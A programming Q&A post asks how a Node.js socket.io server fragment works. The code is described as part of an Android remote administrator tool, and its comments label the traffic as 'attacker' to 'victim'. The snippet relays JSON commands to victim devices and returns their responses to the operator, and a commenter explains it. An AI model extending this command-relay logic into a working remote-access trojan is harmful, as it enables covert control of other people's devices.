# Can somebody explain what is happening in this code?

Tags: javascript, node.js, server

This is server of android remote administrator tool it use socket.io to communicate with clients I want to know how it request and get response like why there is (d)? Where the came from

> What d is doing here? And data

```
const request =(d)=>{// request from attacker to victim
    let { to, action, data } = JSON.parse(d);
    log("Requesting action: "+ action);
    io.to(victimList[to]).emit(action, data);
  }

const response =(action, data)=>{// response from victim to attacker
    if(adminSocketId){
        log("response action: "+ action);
        io.to(adminSocketId).emit(action, data);
    }
  }
  const responseBinary =(action, data, callback)=>{// response from victim to attacker
    if(adminSocketId){
        log("response action: "+ action);
        callback("success")
        io.to(adminSocketId).emit(action, data);
    }
  }
// LOGGER
const log = (log) =>{
    console.log(log)
  }
```

Comment: Not sure what this whole tool is, but here are a few small observations: `d` seems to be a json object with keys `to`, `action`, and `data`. `response` and `responseBinary` are identical, except that `responseBinary` allows you to call a callback function (like maybe `log`?) with the string `"sucess"`. Do you have any more information about how this server is used? This code doesn't show where these functions are called.

Comment: You can see the source code here https://github.com/anirudhmalik/xhunter